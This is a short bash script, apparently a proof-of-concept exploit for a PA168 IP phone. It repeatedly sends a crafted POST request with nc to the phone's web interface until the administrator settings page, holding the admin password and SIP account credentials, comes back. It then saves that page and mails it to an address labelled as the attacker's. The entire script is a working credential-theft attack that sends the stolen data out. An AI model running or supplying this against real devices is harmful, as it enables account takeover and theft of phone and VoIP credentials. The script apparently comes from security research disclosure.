#!/bin/bash

host="192.168.1.100";
attackers_email="adrian.pastor-AT-procheckup.com"
req="POST /g HTTP/1.0\r\nContent-length: 13\r\n\r\nback=++Back++\r\n\r\n";

while true
do
        res=`echo -en $req | nc -nv $host 80`;
        if echo $res | grep superpassword # if this gets returned, then we got the settings page with all SIP account and IP phone creds
        then
                echo "GOT IT!"
                echo $res > "admin-settings-page"
                echo $res | mail $attackers_email -s "PA168 IP Phone admin's settings page"
                exit 1
        else
                echo "bad luck"
        fi
        sleep 5
done